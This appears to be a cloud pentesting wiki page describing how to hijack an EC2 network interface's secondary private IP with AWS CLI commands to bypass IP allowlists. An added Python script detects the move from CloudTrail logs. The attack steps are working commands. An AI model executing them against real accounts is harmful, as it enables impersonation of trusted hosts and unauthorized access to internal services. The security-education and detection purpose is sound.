# AWS - EC2 ENI Secondary Private IP Hijack (Trust/Allowlist Bypass)
{{#include ../../../../banners/hacktricks-training.md}}
Abuse `ec2:UnassignPrivateIpAddresses` and `ec2:AssignPrivateIpAddresses` to take a victim ENI's secondary private IP and move it to an attacker-controlled ENI in the same subnet/AZ. Many internal services and security groups gate access on specific private IPs. Once the secondary address has been moved, the attacker's instance answers for the trusted host at L3 and can reach services allowlisted for that IP.
## Prerequisites

- Permissions: `ec2:DescribeNetworkInterfaces`, `ec2:UnassignPrivateIpAddresses` on the victim ENI ARN, and `ec2:AssignPrivateIpAddresses` on the attacker ENI ARN.
- Both ENIs must be in the same subnet/AZ. The target address must be a secondary IP (the primary private IP cannot be unassigned).
## Variables

```bash
REGION=us-east-1
VICTIM_ENI=        # ENI that currently owns the secondary IP
ATTACKER_ENI=      # ENI in the same subnet/AZ that will receive it
PROTECTED_SG=      # security group of the host that allowlists the IP
PROTECTED_HOST=    # IP/hostname of the allowlisted service
```
## Steps

1) Pick a secondary IP from the victim ENI. The JMESPath query is single-quoted so the shell does not interpret the backticks around `false`:

```bash
export HIJACK_IP=$(aws ec2 describe-network-interfaces \
  --network-interface-ids "$VICTIM_ENI" --region "$REGION" \
  --query 'NetworkInterfaces[0].PrivateIpAddresses[?Primary==`false`].PrivateIpAddress' \
  --output text | head -n1)
echo "$HIJACK_IP"
```

2) Ensure the protected host allows only that IP (idempotent). If SG-to-SG rules are used instead, skip this step:

```bash
aws ec2 authorize-security-group-ingress --group-id "$PROTECTED_SG" \
  --protocol tcp --port 80 --cidr "$HIJACK_IP/32" --region "$REGION" || true
```

3) Baseline: from the attacker instance (e.g., over SSM/SSH), a request to `PROTECTED_HOST` should fail without the spoofed source:

```bash
curl -sS --max-time 3 "http://$PROTECTED_HOST" || true
```

4) Unassign the secondary IP from the victim ENI:

```bash
aws ec2 unassign-private-ip-addresses --network-interface-id "$VICTIM_ENI" \
  --private-ip-addresses "$HIJACK_IP" --region "$REGION"
```

5) Assign the same IP to the attacker ENI (on AWS CLI v1 add `--allow-reassignment`):

```bash
aws ec2 assign-private-ip-addresses --network-interface-id "$ATTACKER_ENI" \
  --private-ip-addresses "$HIJACK_IP" --region "$REGION"
```

6) Verify that ownership moved:

```bash
aws ec2 describe-network-interfaces --network-interface-ids "$ATTACKER_ENI" --region "$REGION" \
  --query 'NetworkInterfaces[0].PrivateIpAddresses[].PrivateIpAddress' --output text | grep -w "$HIJACK_IP"
```

7) From the attacker instance, source-bind to the hijacked IP to reach the protected host. The address must be configured on the OS; if it is not, add it with `ip addr add $HIJACK_IP/<mask> dev eth0`:

```bash
curl --interface "$HIJACK_IP" -sS "http://$PROTECTED_HOST" -o /tmp/poc.out && head -c 80 /tmp/poc.out
```
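Detection note, added here and not part of the original page: the move above leaves a recognisable pair in CloudTrail, an `UnassignPrivateIpAddresses` on one ENI followed shortly by an `AssignPrivateIpAddresses` of the same address on a different ENI. The script below correlates those two events over a time window. The record layout it assumes (`eventName`, `eventTime`, `requestParameters.networkInterfaceId`, `requestParameters.privateIpAddressesSet.items[].privateIpAddress`) follows what EC2 writes to CloudTrail; the ENI ids, IPs and ARNs in the sample file are constructed.

```python
"""Flag secondary private IPs that moved between ENIs (CloudTrail correlation).

Added example, not code from the page.  The CloudTrail field layout is an
assumption based on the EC2 API request shape; adapt it if your records differ.
"""
import json
from datetime import datetime

UNASSIGN = "UnassignPrivateIpAddresses"
ASSIGN = "AssignPrivateIpAddresses"


def _event(time, name, eni, ip, actor):
    """Build one constructed CloudTrail record in the assumed EC2 layout."""
    return {
        "eventTime": time,
        "eventSource": "ec2.amazonaws.com",
        "eventName": name,
        "userIdentity": {"arn": actor},
        "requestParameters": {
            "networkInterfaceId": eni,
            "privateIpAddressesSet": {"items": [{"privateIpAddress": ip}]},
        },
    }


# Constructed sample CloudTrail file (all identifiers are made up).
SAMPLE_CLOUDTRAIL = json.dumps({"Records": [
    # IP moved from one ENI to another 20 s later: the hijack pattern
    _event("2024-05-01T12:00:00Z", UNASSIGN, "eni-0victim000000001", "10.0.1.50", "arn:aws:iam::111122223333:user/compromised"),
    _event("2024-05-01T12:00:20Z", ASSIGN, "eni-0attacker0000001", "10.0.1.50", "arn:aws:iam::111122223333:user/compromised"),
    # Same IP re-added to the same ENI: benign re-configuration, not flagged
    _event("2024-05-01T12:05:00Z", UNASSIGN, "eni-0benign000000001", "10.0.1.77", "arn:aws:iam::111122223333:role/ops"),
    _event("2024-05-01T12:05:10Z", ASSIGN, "eni-0benign000000001", "10.0.1.77", "arn:aws:iam::111122223333:role/ops"),
    # Fresh assignment with no preceding unassign: not flagged
    _event("2024-05-01T12:06:00Z", ASSIGN, "eni-0fresh0000000001", "10.0.1.99", "arn:aws:iam::111122223333:role/ops"),
    # Moved across ENIs but 90 minutes apart (listed out of order to show sorting)
    _event("2024-05-01T12:30:00Z", ASSIGN, "eni-0slowdst00000001", "10.0.2.5", "arn:aws:iam::111122223333:role/ops"),
    _event("2024-05-01T11:00:00Z", UNASSIGN, "eni-0slowsrc00000001", "10.0.2.5", "arn:aws:iam::111122223333:role/ops"),
]})


def _parse_time(ts):
    return datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ")


def _ips_in(record):
    """Private IPs named in the request (the assumed privateIpAddressesSet layout)."""
    params = record.get("requestParameters") or {}
    items = (params.get("privateIpAddressesSet") or {}).get("items") or []
    return [i["privateIpAddress"] for i in items if "privateIpAddress" in i]


def find_ip_hijacks(records, window_seconds=600):
    """Return a finding for each IP unassigned from ENI A and assigned to ENI B
    (A != B) within window_seconds.  Findings are sorted by assign time."""
    relevant = [r for r in records
                if r.get("eventSource") == "ec2.amazonaws.com"
                and r.get("eventName") in (UNASSIGN, ASSIGN)]
    relevant.sort(key=lambda r: _parse_time(r["eventTime"]))

    pending = {}   # ip -> list of (unassign_time, source_eni, actor)
    findings = []
    for r in relevant:
        t = _parse_time(r["eventTime"])
        eni = r["requestParameters"]["networkInterfaceId"]
        actor = (r.get("userIdentity") or {}).get("arn", "unknown")
        for ip in _ips_in(r):
            if r["eventName"] == UNASSIGN:
                pending.setdefault(ip, []).append((t, eni, actor))
                continue
            for t0, src_eni, src_actor in pending.get(ip, []):
                delta = (t - t0).total_seconds()
                if src_eni != eni and delta <= window_seconds:
                    findings.append({
                        "ip": ip,
                        "from_eni": src_eni,
                        "to_eni": eni,
                        "seconds_between": delta,
                        "unassigned_by": src_actor,
                        "assigned_by": actor,
                    })
    return findings


def scan_cloudtrail_file(text, window_seconds=600):
    """Parse a CloudTrail log file ({"Records": [...]}) and run the correlation."""
    return find_ip_hijacks(json.loads(text).get("Records", []), window_seconds)


if __name__ == "__main__":
    for f in scan_cloudtrail_file(SAMPLE_CLOUDTRAIL):
        print(f"{f['ip']} moved {f['from_eni']} -> {f['to_eni']} in {f['seconds_between']:.0f}s by {f['assigned_by']}")
```

With the default 10-minute window only the `10.0.1.50` move is reported; widening the window also catches the slow `10.0.2.5` move, so tune it against how often your automation legitimately re-homes addresses. A finding where the same principal performed both calls against two different ENIs is the strongest signal of the technique described above.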
## Impact

- Bypass IP allowlists and impersonate trusted hosts within the VPC by moving secondary private IPs between ENIs in the same subnet/AZ.
- Reach internal services that gate access by specific source IPs, enabling lateral movement and data access.
{{#include ../../../../banners/hacktricks-training.md}}